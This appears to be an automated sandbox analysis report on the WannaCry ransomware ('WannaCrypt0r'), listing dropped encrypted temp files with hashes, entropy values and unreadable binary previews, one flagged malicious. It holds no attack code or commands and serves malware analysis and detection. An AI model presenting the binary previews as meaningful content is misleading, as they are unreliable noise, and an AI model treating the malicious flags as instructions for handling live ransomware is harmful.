                                                  Preview:S....%L(.2..o..3...9$......mw.oj.Z..8..n..bif...=.C....;. g....}....Dn.....f......H.r.y... .....q...e..W.......\Vy... .M.....H.......U..Vr@.O.....\z..O.vH...}.j....1eD..,@..f<6`z....F.|..>......#U...$.g].<...........C...`.C.v...X.j.R.N..RQ..j".i..Z9.mV.....;..u,.....4...e..f7..6M..].....N.P-....2.YbN.^..f........q..y/rGyA.V".....!n...j|.H.M...?k..2lN......nJ.K(.I"2.1.........R.RW@.7..T...Af<...@...Mt*...2-.kPx^u]U&..@Ao..,guz........#...o.t.<.2W 7.....@c..7.X.t^..S....'3.>..|..8.c.!..[..?61.\xT^)..9u......&.C..E.M..AT=.&LG.......`....*.4..5......Z.....Az....T4z..>....ue....o...G.C.W..............+sX..&:...y.%5~=.>..g..>I.s.h.E'..........)..v.i.^.L...........D....P..6<H1..m.[.F...X.}5.:uG)+.................R.....u..W5(#=..(.;.M3B....+...W.ZL.i....Kr.8A]......._,.....7...R......+.~.c..D^...M..N..t.qE..._.%L. ...p.Z<.9;.VF......D.&3.}H..q..2.o.S..H..a...F.....r...'..tB.R....T...5A......B..UN.Qw...6.l...i.....|...N.y)...cs>.....j.......0....

                                                  C:\Users\user\AppData\Local\Temp\61.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.78560332413643
                                                  Encrypted:false
                                                  SSDEEP:24:8ea7PVMFJP6LVt6PhAeT/UadfJ18tXwjIYIV8cdnP:8eRP0AhA6p31AXyIBy8P
                                                  MD5:358CA0F1B146F73378A3CCFB206D888F
                                                  SHA1:D3A403B096E28F4C311A221BF94B15A409A90B9D
                                                  SHA-256:92D6A324736291AB667389F4EA5B99A854D01DCA2699630A58DA1DAC6EFA56A5
                                                  SHA-512:802F0BC3009532180684B58C1DC9E896A537F17FE6D06D1692BD84C7F6538F05048DCC392636BF4FD33452025FBC08929CFD9D468459E464BB64F07A8CE3AA39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:N....S........*.R.|D<tT>...(.n..b..y.4. .UU].yMI............8....y.sz..<Y..D|..)..|..[......V.......+ ,(e...k......L.Y........ f....x.e.P...y..4(k).N+....w6mHD.z....j.+.9..e..}.....9.5....+.wO.C..i2...`..ld.....7.C...1.).6.Px..'.....l.+c..?.H5.\..h..9..y....3.aj.a..5....~.a.<.B...@.J.\m.z}..h.a...5..........fK..D*.Hl..f.\.8s....`..8<r...l...*..v.z..).?...$...O..<m.C...W..i.A.;Z.._`.... ....DL...H...W..6.-".(.l.....E.l...4 .jh@T.....sw(T....>p8.Lo..8..a.....R.t..."mt.TEG...(.....?...0...NC....w..<.V^..B...*...Hx...........9\.Q1S%.....y......k.8+z...[*.9.f.....ff..!. i..$.u.2..l .a.<.:...Y9.BY.X.h...Z..Q(.q^.."M.......Z..........."..4.......R.#....5^..Q-..V.o....3WMUS.>..#7.s.Y.3..a...&.. .F..@.U.}....`s...K.g"B .....`..@...x.'..%x..9`....42g..A..^..\.}.p.y..T;>....Fz.mj.....CQ.CS.M.Pn+M.7.<G....Nq..rZ.j...$.x?.F..PD}.......y...[.f..,....+..r#.r].d..ph.....".k..$....Y.a....N0...5.z2.8B..>C=...,.8........B%3..o..m..._...H.P..8W...S....V...

                                                  C:\Users\user\AppData\Local\Temp\62.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.812360612444189
                                                  Encrypted:false
                                                  SSDEEP:24:ysAELyPGiAYTulvoJtwMOTHBuCufS/b8l5:ysAYPiAYTovutwM+0CufS/Yl5
                                                  MD5:F39F139E4AE90FEB41D371FEB063A165
                                                  SHA1:03B8A5414E6E35DFEE373CF5B66B4ADF229208B6
                                                  SHA-256:520E715124CEA418595B0B0C061286A84915497322DE5868B975FA3A8528737F
                                                  SHA-512:5A7B5367E74BA92F1F0959ED1BDA531AAD9657028465CE5D2061F5CA07EFC36C5CA81633D0DD3B6ABEDFE459B52385EA7A73A4A895977794ABFE0662FFEE41F1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:3..BK..ijtYy..'7.gm.L.K.Z...O...4.`B...-.....V.S.K9'^M]...n...........a]&.O..^.......8.s.....S.,.C.....{.a..."S...e4..]h....#....T...e%..kfM- ...kl<.S...$Fq.R.o...sGX3.RO..,Z.Ou..3..9P[...o.*.$;.*.g.C..3../,a.#..y.yk&3t..=...C.rx..s>ob[3h..]..F.Vj^.....M...U.I.AM...=...$.[..2..P.P../..q...>S..b...P.N..[....)......o%...-.hp%.;.U..at..9..;...[paZS.$...o..W..g<k...I..."zg..'.....C...Q6...$..f....R.i.$@..gq....t../%...j.o..d*...E._..,.....OB6.......w.V.../7....K..Q9.._{n...;...N..).f.(..Y...[.l.^.!..K-.O....>|..?..$F.'..`...$Fy%$..z.......#.......N..b_G.Ye....2."u_......O...O..E....{........9"..,\Rr<..@.....W..I...c....D|...{G$&F..,._7F..${T...m.L@%(@.......>.d...........X../.....f..y.T..'.T......@..).1....W%........M&...e...Fq...`#iV..V2....vy....X.v...Y.h....7l!....gG<4.8z....g..d..e.m .X.2.$....+....}..........,......@-....*.]j..b^.O.......7...pC..}.>...Ql1.{L..l.!kMuY....>.=.Va..B..6.s.FU.....pg.....\.q.N.&w.|0.?}....@1........Ej.$].\..

                                                  C:\Users\user\AppData\Local\Temp\63.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.814816740887121
                                                  Encrypted:false
                                                  SSDEEP:24:OUeXO7RHFsTSXseWrT2OsKssDGfzdnjfPWTZn:OUh7RHFsWe2msQaz5rPWTZn
                                                  MD5:0A246085D7210CC2C2137F8ECABEBB50
                                                  SHA1:5E987FD903088BAB187A9217565B872A34BF60F9
                                                  SHA-256:5EDF801987F8121CED9D0DD690CA053498A6F323A6154324DA8AD3A81B0CDD43
                                                  SHA-512:5659CE74136FAEBD16438658A422947589079D3DF8ABB87491BCB3E8A1A7C277BC98C112B0761616135AC9B0B07DDA9CDB5A10469C5B8B171F080F9A3176516D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....I.TV-..l...'...-\;..%Ay7._..g.r.y.L..%p@...]...R..:Y..X<..t..........Maez.m5.nTP.....)..,i/*.r...Iz.{.{.a....1...9..e-..k.....6,=......B...l..7N9Y...2.....G+.,.oFm.{.,..Nt.!...<...o.......F<.].kfdt.(..hJB...`.T.$..,.$..I.]..X....<......5.*..g@R.,s....d..b...Z@.Q.....`..p..|\..V)..,@gS=...Sa.<.....(.D....?.jz....`.S.?C...5..fyJ...^WZ..+..H.i....Z..\....Y@.z..!S.D...b..[.5..T.Iy...>}X.$n.#...]|....OQY..WBb........3......<(.{KJ7.......-..r".s..{..=I.6....;../.6......+y...>...~..39........1Z..v.[..d..vL.5U`..c.P....?c<.......*.....+..3...k.^Zn..B&.:..B.3.hQ.g..cF}+.w...D.p/...;C.U.....R....}...Kd..[.......e.....1.g.S..2^4.d9...8.....#....i.x.@.:.}XUb..8... uq..;.@........z......|.G*....%.....4.I5.A... @.D.....Dz..X[!Ki...v..5...$mr...v..t..<.9...T...7...D:.R,..l>=.Afx.....@o.[.&#M}b ....s....R..U..q1..~,.L<..C.Je.....(.C.6r..%..2..y........z;._.....#.!q!n....W.@...X..N.6.6).].o|.U.4..........@...S....z]X<:.t..........0...>:.'..M:51..

                                                  C:\Users\user\AppData\Local\Temp\64.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.823078078306793
                                                  Encrypted:false
                                                  SSDEEP:24:KSBvVVsR+5TDFTKu8OFRvZck5jVBeP9v7/X7iJrI2C6:KStsRQFWupFL5ytbr2rIw
                                                  MD5:13E240ED48EE8EADC3DF0E9C0C7CA782
                                                  SHA1:9EDC2D6DC811CF20AD4D15E8091641B5B8887239
                                                  SHA-256:545B5F1D22F127D3750CC7E029FFD3C7399621CF541D111644794F855FF5A208
                                                  SHA-512:C9A74CB28F81061E3BC79067CA5147C21CE9D88800C0470126C0A3E5F1794A2F65EDBE5ECA0CF1299DF9A8D393961E9BDF1F534A469070C2B9EF5B2CD0EEAB0E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:2.R.F.s..Y&/.......p-q...\2w..x....H.....e...-..U.a.T.....Z].M^[.M.&..Z;>."........m..*F.......4-...%3....wp.....S.Nj.}..n..k..>.M.L.....2#T.R..M.t.*..K~XF..T.l$...U...!.A...D[,../..A..e2;.....J..da.....L./|...7..^.Jt....OS.X.o^}; g...J,.1L[7.U.Gb.V;..p&..t...au]z5J._w.>..BQ.+...TE...f.5.(....W.4E(E.~80...Y.I..k#.)....<......^5..{|.6.w=Cx..1........2.Yt.......*q.Dx...b.q.)....{#|<..Rhm.9.=..]Q......]L7..z..h..I"lDl......L)t..;.\.:.o./........8..b. ..i.df.'.....%....B.].=....<.Me.D....#....8%&.d\?..s_..m:..2W@.^A.T0..+.......ah..<.g...M....%.sW.6..Z-^V.V......Sy....C..j%...o.....gQ..a.w.........93...;}q...........Ksx.>y...&.\.Tb....m.".d3[.?...vX..P._c.K,F>.{.Y.y.....<..-......8...9.Be`.H...2.O.|.uE.{<c.$..#v.6.....,.{.g..O....x....X.;3../ !...L...d..,.N.B.I..o.*..Cd.......Zs.. .Kk..b.........}....s...!,......x....d.._..2.....p......i.1 ...q....A6.@..\.}....t>h...i}....k.Z.F2.x...A.::6...\.a..^..c.^.}.....eI.5%.9h"X>0`?k/..}......P.....V....QR.

                                                  C:\Users\user\AppData\Local\Temp\65.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813391721287467
                                                  Encrypted:false
                                                  SSDEEP:24:QykbM01mIOBuZhcNuJO2JKaZG9F/T2oVBP3KUrMoMil/PJDUUkSIDlOIpTs:Yf1mIfX8MhKaZ8F7JjXYoFlnJIUbol54
                                                  MD5:4745117616B137D3DA356E97F2756768
                                                  SHA1:1DBC68717E4865DAF037BC78969DACBADCE549D4
                                                  SHA-256:A6FE74920B90F342D706D081BE20A292433DA6BBE35BAE822B18CA80F987C8BE
                                                  SHA-512:AE4CC197DCA9DF9217B23A342C5927BDACA37FF1DD5F670D3375C3615252CC6C8C6B86E69E99DCBC4AE6CF8410D012AD93EA92DC11DA924B21567131FD24D701
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...z.q.....^...<..S..OQ..c.r*Q.MPO|*...7..4L'..c.K.&.qQ..L.i(..C..m...?.QfOJ+...?+....3.A....O..k.....:..x...;.P.k..T.....Y.`.^m1.y.Y....OT....W..v.m._5....1.Q.....c._{..k.*[.l....L(.$.Y}i>..Y.......p...$.G}y.,8.."..A..w.`s$K.......(.=2{.i5..u..f.#.........L.t...8...0.Gy..\...h,.....,M.'.YX.L........IH.kt.N\S..K..W..Z..c....../.tX?...P.e..M....oU....O.j).>*ra:fZj.F1d.$.F.t...C^Y.....9.b.Oh..j....a..=..|.E..*..V....Y.)..c.. ....YB...zSw.X..$..-U.\0.27...... ....q.k.k..x......X.q:y.Rv?. X.p-}9..s...z.....7..FU....vH.s...>.Dj.0t...C...:.&..6I.f.8.x..4Y .....V...t_.e..V.l.......L.7o0...U.a.J..P.R..R.2.S.=q.a,,1.v.`......\M.O...9..7...5v....g.>..g.*.q..V.......l*.C..J.@..%....p..j*.....L"?V.i!.....D'.1....k..[..Ir.R.B0.9.J.)...S.{.....s....W....=.....G...O.d..W......KuHK[....eGw.6.\.lqL.......S..8yfm(...C......\m...5...W.c.y?.7.%..\*.E#.3....~c.:..|..J....M},|....q........R*a..NF../..~......=6&.X..qP....a..0_..B.'.....C..?!..

                                                  C:\Users\user\AppData\Local\Temp\66.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:COM executable for DOS
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.83373114041739
                                                  Encrypted:false
                                                  SSDEEP:12:DSbb8aBI+1NLvu1GoEL+hUImxvSd/WZ6p3cxlLZe51jew9RxneZdz5J5ZfWsy4YT:DwBDeuLpbUQ6nzqkheF1+sy4BMiHhSv
                                                  MD5:0B30E125E00E569F08D183A0AFBA1AC0
                                                  SHA1:0686DE7755B4158918880BF029D0493EFFD90BE2
                                                  SHA-256:7C730340DA27BCC506CA6A79F81AF8CA42DBB8F30BA66C14F06DA17AA6884D2F
                                                  SHA-512:71F8805A92A11AE654E04C7D5346AC35D3583E74B95C0349CFDA786521C9FC7A846ECEB333BE298AFB532CF29C20AA6517E365EF55356ED0DC7AECFE505F0C6D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:..[...t."...\uVy.j...vY......*T.y38.J+...1..4......-.......='Bi....3K....^.,...v......lr..*....O..s.5...V.p.M...G6...[p.u..{.....><gN.O..............O..y,0..i.xO'_..!.al....o...o..>^:..}.K&.....[..@".............~f%..NJv.c.\..#...4.g#..~.J_}..`.....5@..$#.....B.=.[...$......_O;.6.y..'.....e.g.E...w.J..'.m..B.e.........[;.=....}zL....h....6...S]..F....|.....G.9n%8..'i.rb,'.H....Y..\j...$.0b.F../...W1.z..L..+...(.qW...m.U.h";..e.w......s..p...E,.'.p..`,._.-2...C&.P\.SN.1.9W.H.T .SX..n.:s..8;h..4...0mT.}.pt........X....mi...{z#N:...L.p..q..1S8.).1.w.j..a7...#.....]#m..).........m*.u."....U.|....P.....|.QoMM.@Zf.f..z[..X%..m.8a5.A..k.%......e.........U.....HS.^*i.................U.1#.....5.$q.s....X<O%q......w.s>.68....Z...B.5.B..b4...k...]........c...lk,.....B..a}.W.....ce.......? ..?.....j.....4._.|7...h-....[Eq.. "..?xbLF...9..5.%&6.i...7X..v`..{.G.BP..g4..5...d.bH...zs..(..G.....7.x.W..+.k..........O.m....U#.4.P.cA;.Py..U3.

                                                  C:\Users\user\AppData\Local\Temp\67.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80916666933428
                                                  Encrypted:false
                                                  SSDEEP:24:bHLAOC+rEuhVUQTC5+lboUzWSjTn2PBtfiz4rJLwuRQ6xJfyLMEQW:/YiEE+QOYlf32pt6zMlF7fyLL
                                                  MD5:5D0883E414799FDD01AE76AB7E3AA011
                                                  SHA1:ED13947D25F076C6E7C8E7C3204B9EFCB93D7BFF
                                                  SHA-256:5BF3B7F06951E6BD99B1224E6AA8B769F4C12F5E6DB6633513D2DE32546CFB2A
                                                  SHA-512:AAC1FB4F862E4862042E91024C65363B78A977A00D0D3E580F3D37B47F788C83E4A72FF64100574A86CF5ADCFC7E9A4EE17B3D9D64AC91B4FC40BBACE8BA25C7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....:..=.....L..*...4.._.....^@.<f.6...2.z.;..K<g.....i.\1....G..~..H...@d5...y`...C`..B...,..YH...;.m....n...6g.Z^.......|..L.{..EI8d...*...@.[.*n.(...o..R....`....z....w..<.............A.G....._.>....Q...Y.Z.....BY....NM.f...o:w=..6..7<Y...,..W.4..?.?..&9.;=.._.8.D.Cv.o...=.P.l.*..U..x...W.zq...........h0.*.^Bi.........Yw.......E..!.r....S.8'....no.z..G...Y.F..1..<.h.dm.k..Inx.......N.on}3....H..#8....{..N..@._..A.d#.i.v,Th.n>..ox....z;Ry..4.......JeX.W#1.W.tQq..T.=)....G.....H<f@..M......).M...S.... EnC2....%1..D6..p........T-.=_......pK.X.....0.....-P.p.(...K..<!.O~L.(.rg#..].....Fb.1G.MDs_6..g?d....e.....O.Q.'4k.}.....8...w%!'...)..x....x......?../.....S....P....~.h.L{.w..)q..?..F.R%Lp.....ZZ.Pe..+..^.f.B..4..N..*.s.....C;R.@..XH....g...".......J'\......W.+.....B...;.+r.z..._.N.A...4pW..s.v..q.#.^.w...6}p......._;......4in.Mb.4!...[..i......5......S.M8.-cO....p.....R.K...-...8..:R.......Q3....a.y.-...uV..m..C.........q..f,..W.........K.

                                                  C:\Users\user\AppData\Local\Temp\68.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.791364155426318
                                                  Encrypted:false
                                                  SSDEEP:24:kvH1luMGxrwSp2hYTVHuh4S38FDgjmpb0+mJFC5LskgFfrGPtO9:SuMGhhrT9uhr8FDgjib0tLieFClO9
                                                  MD5:C6C9793C9BD4121C420F5224B8C4C994
                                                  SHA1:5BFF65B6E212C788A79DF86F1D2426C44DB05783
                                                  SHA-256:CD32450E810D600F063AB39072861C6A9A08CA42B845E2CB0264BDA6D11EDB8E
                                                  SHA-512:CE5A64F848BB13C99C908DC271E6EFD012387E504E7290BFB57B122F29FCA21C24053E037B82A7F834EBD4DEBB948DA9B80DB5B56F9BCEEBFF976AD44ACDF320
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..I..{t4._.^.h.2P....{p\r..y.n,..b-.04...(..o...Mw..T..h.H-..Y..-.O..).."....`...>a....q..S.>..w[..R..#..4...x~hR_.gQo6..P..u.....!..cjX.<.5.a...z.M!.9L5V..Q.......`;KF."..Mc.92..+..,d.m......il..6.g.$...E3..Z.._....*.q...{[.m..:-T?j..a.....h.2...V...|m...S...w.C...8...)a-8d.......Ky...1.:....b.x.u.../o..q...L7&Ci..........a~X.^.G.....>E4T.[.y.Bp..B9....]...8...L..3) ?...jd............'....E.;....)L.X...v..K.a .>.2Fl..kfL........._H.4~w .:@MCQa.P..-...O..."#O^u..F|..91uF._]..~.......F..1.5>.A..Q.O........Qq..GH.....5...n,.-.('I...Y..pu........%......W..c.....$...4...w.Q.......\S.,9.Bk.....5.Fm!.c.......:.,.......%...B.g......v..N...v...'........Q..N......x.F.Vt6..c.,.1.../Z(nED....eQ...f...O...S..[i@.Q.n.OC.......L......vk.......c3..u.)......N....E.C..F(\.Vc.N...y.M.$..Pv.l./.f.;akgD..-....K..D.....x....]N..-.....Ok...E......w..=....A...Z@|..K>e.............@.#......&......ff.q..F.j.....>...\.4.....0T.M43..s......W.qV...sd....'.F..7....

                                                  C:\Users\user\AppData\Local\Temp\69.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.782576802731599
                                                  Encrypted:false
                                                  SSDEEP:24:0xbZy+wiSW7xX5ijM6SLaFjifUBp2+TIIAzZemJvpUYT:0dZdwidxJijMtaJisBp2+NAbJRVT
                                                  MD5:1745903D46EAC6D840523E9D16967F5B
                                                  SHA1:DE9F31E627556E04D95DD5938C5293904825A934
                                                  SHA-256:A7FD505AE9D11AF874ECD1436CF5C50C7E7DE787C5F7D90B72039992DFDF5EDB
                                                  SHA-512:1C5DEED0EE5FA3B6F33C5C7C5F685394DDBF322F4B94398F8DE8385C82A549E27D4CA330566373614C3948876B6E74868B5800D209D639EE50F8F3CE833B8BD4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..Xdl.$..?.|..E....}l..:..A.K.[H... ....(......."PV.i....w..'h..$..G..1.....k'^j.!.m.5E|.y.}.{.\.4...I..F.&}.Ewa.!...Ck.........r.%....`.. .D.Y......;.}<....O$y..C.e..I...U...M....=...G..+......N......`2...||yv..'...e.K ........R...}....Z....UK....&N(Y...U-...q.O........T...C..v.{.5.&......-F[.p.h....bIu...]..(l.62kX~{....j.'.../R...`.].o....dZ.m+.....M.).iLU.*.X......Q..!e1.m.5.Y.PU.r...J.....`..i..G..&?@.....u.U.u......A.......>.].s.2.:z....H...D..3L..Eq.....GT....1.j..:.5.....c[.....l...PjX.rH.......u9p(.+...-r7dpH.-...s.8...5./..:5....4.8.c'...d...Y_0*.. ..._..#.@.(zDD..l..*\.GT1..F!#.k.p...&.;.f.m...M(..]{J.p..5..G..,B..;A..._..G.t..r.g.hi...5z./..<.;.3P.....I(5&A..I...c`TQ..........k...|7..D..!8lw..#pe..H...}.U...$m.s..-B..._.=../..NF..W.`y......@.)&f.]jh...r...|$...2*'Av.q.!i1....sI.M.....Q..5D....,.....G......?......)./!...].:P...x.....g p....On..3.>..#..].2OBq>.`.......?.Xl..M..)..'.......TBG-uQ..w..zQ.!......Ql..g. =.I.#.....

                                                  C:\Users\user\AppData\Local\Temp\7.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.806038744753786
                                                  Encrypted:false
                                                  SSDEEP:24:U9AV7CVBbVSk5ChrsCPgk0bnAvb4rKxCiRnMOv:GpBBt5ChrsCPgRjY0rNiRR
                                                  MD5:1114513BBBDBFB82E197CDD8F61D085B
                                                  SHA1:DBF1AE27225CC13B2FA0460DEE7FE74B19FA3AE7
                                                  SHA-256:00966092DD665F6C8F9D95CCFA724FE689929CEBD2C4B18E415F33BDC54F0000
                                                  SHA-512:F47539CA1C88AF28DA545D37228F1EBF7D4F9910815D6479E0B6479F4EE6165CC331218C579535DDCBA5E77CB98FA000B8D47AF8EF7D7E5FE4AEC25EA477C8F0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....q...D.*....].5......[...C.V..M.Y.N.DlkN..j..q.fm..c...\.2.B._........l.7....2.B#.,.....~......V....k..>qE!P...E..uz..mO....X.@.F(..C.....g{X.....S..Zj.W.+vu).C..'.OB.....x.W.h...=.....<Y.]..|.F..G|.}..........E.UC.Wv.D.-.A...q6G..a(`)......\@.6NL...L....*...+|....)....w.6.|...#$p.nG..H..{..*..........Z4.......?.1;s.q.W...g.?.g..,U.b.........L...K..y..E.u...oN....L...T.m.:.Q.q.....f..t:......R<..(Ky+?....0V.g...vrF.Z&..*Qos9w....p.=...@%w..|E;.*jq.z4......J...XC..:,(I..p.*!.t9S..$.|.qeStyn.(d.\S....:...6R.T......!.o.IO.+.......1.......9`;w.s.. ..3...26.......N.T.E.....j.12...@......VU._|B...\MW>....2C... ...#.'......7.B...*q.....S.0..x#...k.-.EP.".....*..|.....x........r.I....,...t...K...7..A...)......%...dF.E...\i..u.S.........^m.z..X..5F....B.=...2...J..!&....,.G.a.....>H..1.W..."NE:./...u...#..........'8..\J6....w..+.&oH2!.....H;..{....L.jR..c>.o.U.N.R547"..d...!0....`.@.... ..L&...R..Q-uf8Y....._".i.27..8...W..a.O.....BG!.8..S..%+..}p.t...

                                                  C:\Users\user\AppData\Local\Temp\70.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.801972753416064
                                                  Encrypted:false
                                                  SSDEEP:24:CkGYSOZfdKYd5M40tmXWd47okFHtr+Mq9sptQkyxV/iNtDOj:CkpfdTdF+nd4zN6MP49xV/iHQ
                                                  MD5:A9DA251708953A180E9E4DDE39145D4A
                                                  SHA1:9E6FE1EFF1451F933870192A8EDAC1C454EF78F7
                                                  SHA-256:B297197BB6754BA8693403EF87D6B5435651C4F777E3DF90914D439A77899AB8
                                                  SHA-512:602C9D316CFCFBBCABD144EDF708EB9E4A40E70A46A5200EA58D4FC8D7B23C00481125841A35EEEE6A0ED98C4B4D62471D36494D6F650EC37587CC7D8EDEC643
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:c..7cw.qy.j.....*/.kE.p...+D>.+lX..Z...A!....l.B....&.\.<..(.g.\._..Z.....+.......3..D.`..cZY.7....%.9.5@v..&|.N..T8.._.......h......S..q?z7Y..$A......A....nV|S.Q.&.l.Y.%s#U.5.O.r.2>....7.jm`1..$.....E....cP.Q..a....~...0.G.X~.o...S[oN..|.._n.........C8.Z..U.P......;........IZ..r.........H..#I....H.......$.Q....e.....`.GB..I.o....")E^...#..e(...+;...@)..sn.zk...vW.<.,..#T.....'oq<....Z.%...M....L.S....P[.K...G.;m..w.. ."\K......^4..p.....j.X.V1IRC$.w*..`..p...@.!..5B...6tH.......`Y!.I.0@3.C.'q..9.A.+,...Z.....UjV.c..q.|[.W..!.M.?.d6z.'+....*|.~..rZ.w.x..W.G.......j5{....:.q.........z.aK.$....y...@.^'...........r!.3A.}...{s..my<j..f...*d.*^.n..8....ko......7..{..9..d.w.....w+Di........g.<..?..S>.YM.w..)x9...<....a.L..... .+.........I..!;A..]... .no.W.K.>..A...b..W.7p.J...;.J.........E.~>t(c..$.c..L-.WL..=..M..&1.j.1..-.....h..Z.G2.0?]..l...~.".G.>.^8.K@E^(.w.Lg-.e.0.+g...Db...7.z..A..ad....e...jw.>..'.tT=........E_..`.>A.<B....W..\_eh....

                                                  C:\Users\user\AppData\Local\Temp\71.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803180803604506
                                                  Encrypted:false
                                                  SSDEEP:24:h3XW4p5cI0k/PVFadDlyAcn5XctBAQZkKawlC:hHpp5c98PDIYfkBAQZkKawlC
                                                  MD5:DA322898E885F1E8C925EBAECB6045FA
                                                  SHA1:58BA19237E250CC0C338C7B54376C59A323D8CE9
                                                  SHA-256:9DD7C76EBD45BD9968855D56F4E0368C1EBB6C8554BE56AB9B41BA9DE5BAB3B9
                                                  SHA-512:BCA6C334B42D2D27C699646C0F815BDB70DA0741043C44E475E47130603BBDF167DD879D6933A2172829ACAEE51BAB96F3AD1BEC1B1BD754BE75C174EBF87864
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:A....Y$`.Pc.i..5.3W...!].........X..........Z.(.P.[._..{..Q.HfW...PP.N...;..?..~..=5m....J...{......w..../.......B......@.fb.Bi..O..F<?/...#k .h.GH.PB/.......a........P..aFR..e[..3...j...+X.A..V.Al..8..{...%.Jw.5.T...fb...6.k.o^....0]..".89. :.N...s.M...@1.=......h)z.`[@..r;.hhb.!.6%.y..m..m....20..U...U..l.&S..../..tW....:%dn.d.Q.d7L..T..5..o....).M.5..9U.....8J.....#^u.........hJ...xu.z..wn.Q.>....u..n_....C.+5..B...B..u3/.-. ../..z.J.........L..._..0d... ..M.%.0..w.]fj,.5...@.6S...M3W.6.K....3.o?....[.QD..`D....eo&....&g7V.A.P......u'..4.oT....+.A.6^....;..0..i.@.......!........+x....s...L.VL[F5.."..*......?l.c.+a.1J.+5....:s..g.|M.kd v.t'g6..#.B.P.(y..C.CC..}..Ik...y..x..I.H.h..N...L...P...+?..@o>$q.....n..hw.....s......n..)..T.28^Q.'....LP.0R;!.#@.F........~P.....R..}*.1.....t..e.S...=,.....tY....>....P.+..].M......n.9]#.o .-*,35.4.Syp..........'....R.bt.Aw. .8...a.c..%.pT.J8.3..2...p.,.>.8..R.V./.2...J=...+.0.h`..0.; .......I.>'....L.e.

                                                  C:\Users\user\AppData\Local\Temp\72.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.781847511154211
                                                  Encrypted:false
                                                  SSDEEP:24:qtAFNSxi+jA+nx4aNTEANuEjIuQ8nkyhwKknT:YAFN8i4WaNpjBnO
                                                  MD5:3D86B521F5076A842802D1003427F0F8
                                                  SHA1:939BC8066C3DB59564B211A6DAA455C4F1725933
                                                  SHA-256:20B6BB7C51A62C21E4F2F8912C50AF9ADC5A52B4DF89C4F04C7B9AC4ED643941
                                                  SHA-512:B7D82C6A2F62DAB099E4D4F578A4E0E95A35C1EE265D72197E8634B13F9677E5BD4D48BEB7D0E308A797C078A284DCE3F86FBE8E376EDB3A83093CACA142CC88
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..?..c.......=>.i.......3....`.}BW#..QI..~K....L.?.<.J.+[62O..L.f..V.ZhR....h.......v.AR.n.^&3.t.Q.]....'*.o....4.S....m......<...(b1I..........J.......d7..o.....-..yBG......^.5..d^..q1.`...N.a....j.%O.r.X.EZ.._.,t+jhf.......r.+].T...`h..+.&x......!..~.~c.u..GI.a..~.".H[...o!.....O....+....r&..F...1..L.Z..P..K...a..Q/...Z~..tP...sK...N...L..... .5&.q.E.9..I....A$2..51.Q....ir..C.H...."}.X....*..f<.<.LK.........j)d...M..YR.(...K<.x2d.A2......D..W}..Q.jP.iG......hl.U.B.@.....^h..$&....j..0K.2m.........7..8..M...>.2\qMu#.P.'.P.(..5...E.;?..G.-.......RMA,IcA..N:.%.d..].E...2k......y{.6..\%..i.....jA.Z.5.y7.U..$....L)......jz@..x.m...)..>OG...o.d.(U.3.#w......#Ys~.....PNQr.%....g_,...6.k............e.6u...I..s.4..q....-..D)S.<..........}"...'?UI.F.'K.h.d(.$>bgx.....Q./.._5@_l.[?E.UO..(.=.`.bu......0gO...I....+-V@.l.........mW-&Q.6a'?..qZ:..........jNy..5I.f.L..>b?...(.Z.ni..].....n_.?ym...>.B;#...z\.t/H..L,.....<..2U.,.jW;...4.....lV%._3.(.L._

